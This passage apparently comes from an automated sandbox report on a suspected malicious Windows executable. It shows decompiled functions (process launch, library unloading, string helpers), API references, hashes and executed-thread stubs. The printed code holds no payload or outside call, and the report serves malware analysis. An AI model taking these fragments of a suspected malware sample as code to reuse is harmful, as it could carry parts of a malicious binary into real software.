								 *0x41fcf4 = _t16;
								E004048F1();
							}
						}
						L11:
						return CallWindowProcA( *0x41fcfc, _a4, _t15, _a12, _t16);
					}
					_t11 = IsWindowVisible(_a4);
					__eflags = _t11;
					if(_t11 == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404871(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 == 0x20) {
					E00403FBE(0x413);
					return 0;
				}
				goto L10;
			}

0x00404f1e
0x00404f28
0x00404f3e
0x00404f44
0x00404f66
0x00404f69
0x00404f69
0x00404f6f
0x00404f71
0x00404f77
0x00404f79
0x00404f7a
0x00404f7c
0x00404f82
0x00404f82
0x00404f77
0x00404f8c
0x00000000
0x00404f9a
0x00404f49
0x00404f4f
0x00404f51
0x00404f89
0x00404f89
0x00000000
0x00404f89
0x00404f5d
0x00404f5f
0x00000000
0x00404f5f
0x00404f2e
0x00404f35
0x00000000
0x00404f3a
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404F49
CallWindowProcA.USER32(?,?,?,?), ref: 00404F9A

Part of subcall function 00403FBE: SendMessageA.USER32(0001042E,00000000,00000000,00000000), ref: 00403FD0

Strings

, xrefs: 00404F2A

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: d7dba211b113031370aa0d375adf93c2d3682e4ecf800ebd227cab9ba7078c69
Instruction ID: ada5cd990895b4516a8014aeb551998318656f9532c53fc1dec2d506d9983591
Opcode Fuzzy Hash: d7dba211b113031370aa0d375adf93c2d3682e4ecf800ebd227cab9ba7078c69
Instruction Fuzzy Hash: 4A01B5B120420AABDB205F51DC80EAA3629EBC4760F204037FF007A2D1C779CC519669

Uniqueness

Uniqueness Score: -1.00%

Function 0040551E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040551E(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x421510->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, "true", 0, 0, 0x421510,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405527
0x00405547
0x0040554f
0x00405554
0x00000000
0x0040555a
0x0040555e

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 00405547
CloseHandle.KERNEL32(?), ref: 00405554

Strings

Error launching installer, xrefs: 00405531

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 8c32d595c10ae78cfc35805ab98709760fd6cf99201592758dbf5461ff55bb51
Instruction ID: 1d4148ad6eaacfcecf7e5fe240300d0df3a21eae91f53eb7f4beeb93af14ec15
Opcode Fuzzy Hash: 8c32d595c10ae78cfc35805ab98709760fd6cf99201592758dbf5461ff55bb51
Instruction Fuzzy Hash: E8E04FB0A002097FEB009B64EC05F7B7BBCEB00248F404561BD11F21A0E374AA508A78

Uniqueness

Uniqueness Score: -1.00%

Function 00403678 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403678() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41eccc; // 0x790988
				_t3 = E0040365D(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41eccc =  *0x41eccc & 0x00000000;
				return _t3;
			}

0x00403679
0x00403681
0x00403688
0x0040368b
0x0040368b
0x0040368d
0x00403692
0x00403699
0x0040369f
0x004036a3
0x004036a4
0x004036ac

APIs

FreeLibrary.KERNEL32(?,75C43410,00000000,C:\Users\user\AppData\Local\Temp\,00403650,0040346A,?), ref: 00403692
GlobalFree.KERNEL32(00790988), ref: 00403699

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403678

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: a52acb0b260d536fd7618f3e20de318eec4c6c539c6bb2def64801f0e67eaa78
Instruction ID: 0f9b0890dcd7d6d94eefd66c0e065c423b3673a0175166a0ff672ff23ced6f32
Opcode Fuzzy Hash: a52acb0b260d536fd7618f3e20de318eec4c6c539c6bb2def64801f0e67eaa78
Instruction Fuzzy Hash: CAE08C328000206BC7311F46ED04B5AB7686F49B22F02456AEC407B3A08B742C428BC8

Uniqueness

Uniqueness Score: -1.00%

Function 00405846 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405846(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405847
0x00405851
0x00405853
0x0040585a
0x00405862
0x00000000
0x00000000
0x00000000
0x00405862
0x00405864
0x00405869

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\wLlREXsA9M.exe,C:\Users\user\Desktop\wLlREXsA9M.exe,80000000,00000003), ref: 0040584C
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\wLlREXsA9M.exe,C:\Users\user\Desktop\wLlREXsA9M.exe,80000000,00000003), ref: 0040585A

Strings

C:\Users\user\Desktop, xrefs: 00405846

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction ID: d8d152633c25ee245afb7ed9351c3db19b5e7623dca51a79be3aa08ff23b767b
Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction Fuzzy Hash: 79D0A763408D701EF30372108C04B8F6A48CF13300F098863E440E61A1C67C0C418BAD

Uniqueness

Uniqueness Score: -1.00%

Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001556, _t52);
				_t43 =  *0x1000405c +  *0x1000405c * 4 << 2;
				_t17 = E1000123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E10001266(E100012AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E100012D1( *_t55 - 0x30, E1000123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc("true", _t43 + 4);
								 *_t31 =  *0x10004030;
								 *0x10004030 = _t31;
								E10001508(_t31 + 4,  *0x10004064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x10004030;
							if( *0x10004030 != 0) {
								E10001508( *0x10004064, _t34 + 4, _t43);
								_t37 =  *0x10004030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x10004030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}

0x100010e7
0x100010ef
0x10001103
0x1000110b
0x10001116
0x10001119
0x10001121
0x10001124
0x10001126
0x100011c4
0x100011d0
0x1000112c
0x1000112d
0x1000112d
0x10001130
0x10001131
0x10001134
0x10001203
0x10001206
0x1000119e
0x100011a4
0x100011ac
0x100011b1
0x100011b4
0x00000000
0x100011b4
0x10001209
0x1000120a
0x10001186
0x1000118c
0x10001194
0x00000000
0x10001194
0x10001152
0x10001153
0x1000115b
0x10001168
0x10001170
0x10001179
0x1000117e
0x1000117e
0x00000000
0x10001153
0x1000113a
0x100011d1
0x100011d1
0x100011d8
0x100011e5
0x100011ea
0x100011ef
0x100011f5
0x100011fb
0x100011fb
0x00000000
0x100011d8
0x10001140
0x10001143
0x00000000
0x00000000
0x10001149
0x1000114c
0x1000119b
0x00000000
0x1000119b
0x1000114f
0x10001150
0x10001183
0x00000000
0x10001183
0x00000000
0x100011ba
0x100011ba
0x00000000
0x100011c3

APIs

GlobalAlloc.KERNEL32(?,?), ref: 1000115B
GlobalFree.KERNEL32(00000000), ref: 100011B4
GlobalFree.KERNEL32(?), ref: 100011C7
GlobalFree.KERNEL32(?), ref: 100011F5

Memory Dump Source

Source File: 00000000.00000002.1046900983.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1046873048.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046935240.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046965779.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_wLlREXsA9M.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00405965 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405965(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405975
0x00405977
0x0040597a
0x004059a6
0x0040597f
0x00405988
0x0040598d
0x00405998
0x0040599b
0x004059b7
0x0040599d
0x004059a4
0x00000000
0x004059a4
0x004059b0
0x004059b4
0x004059b4
0x004059ae
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405975
lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040598D
CharNextA.USER32(00000000,?,00000000,00405BC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040599E
lstrlenA.KERNEL32(00000000,?,00000000,00405BC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059A7

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
Instruction ID: 8efc3e124b9a080ca5214cb44e2bf054a0a12cde5ca22a793754520399508618
Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
Instruction Fuzzy Hash: 31F0C232505418FFDB029FA5CD00D9EBBA8EF56360B2500AAF800F7210D274EE019BAA

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wLlREXsA9M.exePID: 7852, Parent PID: 7392COMMON

Execution Graph

Execution Coverage:	0.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	14.3%
Total number of Nodes:	84
Total number of Limit Nodes:	10

Executed Functions

Function 328D2A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D2A8A

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0eacb0199689e8201103fad027f3f434fda3421768db8b8ae943b3e892a79e8f
Instruction ID: a38782a920f0a331630c15dab2cc47729bf02bbf1ff56de5f9fe14524415f374
Opcode Fuzzy Hash: 0eacb0199689e8201103fad027f3f434fda3421768db8b8ae943b3e892a79e8f
Instruction Fuzzy Hash: 9B9002652020100385057258561461A400A47E1201B51C826E5114551DC57588997165

Uniqueness

Uniqueness Score: -1.00%

Function 328D2B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D2B9A

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 44635e81f69b25290867d63073e4488cfc41ed737dc9173860505047198d7200
Instruction ID: b81f0a5be159345bcdecec6acf9431df4ec0ab3d33ce8a495859d6586b4012bc
Opcode Fuzzy Hash: 44635e81f69b25290867d63073e4488cfc41ed737dc9173860505047198d7200
Instruction Fuzzy Hash: DF90023520109802D5106258960474E000547D1301F55CC16A8524619DC6E588997161

Uniqueness

Uniqueness Score: -1.00%

Function 328D2BC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D2BCA

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 29890e112eaccac5c677fda344a7688ff3d555755376e178b962fb412a458a22
Instruction ID: 9d4b04f36505f4fc3d16627a29a917de45a6b6c3644806ca7fb707260384af30
Opcode Fuzzy Hash: 29890e112eaccac5c677fda344a7688ff3d555755376e178b962fb412a458a22
Instruction Fuzzy Hash: 4690023520101402D5006698660864A000547E1301F51D816A9124516EC6B588997171

Uniqueness

Uniqueness Score: -1.00%

Function 328D2B10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D2B1A

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 167029bd881e7cdad40a1906a30874e725fc9dca03731f0634bb5a7eb033c39b
Instruction ID: 8442634f91eec568ba55e983bd502ebe64a6bb0db305eab26e6155ab92c13a18
Opcode Fuzzy Hash: 167029bd881e7cdad40a1906a30874e725fc9dca03731f0634bb5a7eb033c39b
Instruction Fuzzy Hash: 0790023520101802D5807258560464E000547D2301F91C81AA4125615DCA658A5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 328D29F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D29FA

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9e25a5a5e9d4112f014e4240162f926c2d178d0f1ce2611836c84257171df607
Instruction ID: da1f11751dc84227aa13cebc61f6454f75ea408b89a6f5475f68c9d4b96c75a5
Opcode Fuzzy Hash: 9e25a5a5e9d4112f014e4240162f926c2d178d0f1ce2611836c84257171df607
Instruction Fuzzy Hash: 44900229211010034505A658170450B004647D6351351C826F5115511CD67188696161

Uniqueness

Uniqueness Score: -1.00%

Function 328D2EB0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D2EBA

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 05760b6aaeef49ab1af9fb36a533acf01f023c91e2478b2e226b46c3cb29b3f6
Instruction ID: c6cc5aa396e50a1cb85102ad49cf53f728fd9afc71ef896487de7b3dfd3cdb22
Opcode Fuzzy Hash: 05760b6aaeef49ab1af9fb36a533acf01f023c91e2478b2e226b46c3cb29b3f6
Instruction Fuzzy Hash: D990023520141402D50062585A1470F000547D1302F51C816A5264516DC675885975B1

Uniqueness

Uniqueness Score: -1.00%

Function 328D2ED0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D2EDA

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d28a891a396b13879bf1ac5daaf19813d10bbfbc4ed49b2dbcc5b4eaecf519aa
Instruction ID: 2da592eadbd8c5d5be82cc4801eb724880691c7dbe0a21eaec809403b6093481
Opcode Fuzzy Hash: d28a891a396b13879bf1ac5daaf19813d10bbfbc4ed49b2dbcc5b4eaecf519aa
Instruction Fuzzy Hash: 4C90022560101042854072689A4490A40056BE2211751C926A4A98511DC5A9886D66A5

Uniqueness

Uniqueness Score: -1.00%

Function 328D2E50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D2E5A

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55f1916aa8f155381ef226787eb5d35806a6b9bf6d9c08752d6742740f2543e4
Instruction ID: 9cba59133a7ed3b841999b74145e0e962b18aed978613b38b650dc31e984768e
Opcode Fuzzy Hash: 55f1916aa8f155381ef226787eb5d35806a6b9bf6d9c08752d6742740f2543e4
Instruction Fuzzy Hash: 0590026534101442D50062585614B0A000587E2301F51C81AE5164515DC669CC5A7166

Uniqueness

Uniqueness Score: -1.00%

Function 328D2F00 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D2F0A

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 790117c527ec6f29278b0479a4b009b69cbcac19e498e753eec217493bc66e70
Instruction ID: 1a33ca52b8dc3bb24d2c50a4b2647341ef48bdef968086f97f689e756dd1cf7e
Opcode Fuzzy Hash: 790117c527ec6f29278b0479a4b009b69cbcac19e498e753eec217493bc66e70
Instruction Fuzzy Hash: D090022521181042D60066685E14B0B000547D1303F51C91AA4254515CC96588696561

Uniqueness

Uniqueness Score: -1.00%

Function 328D2CF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328D2CFA

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
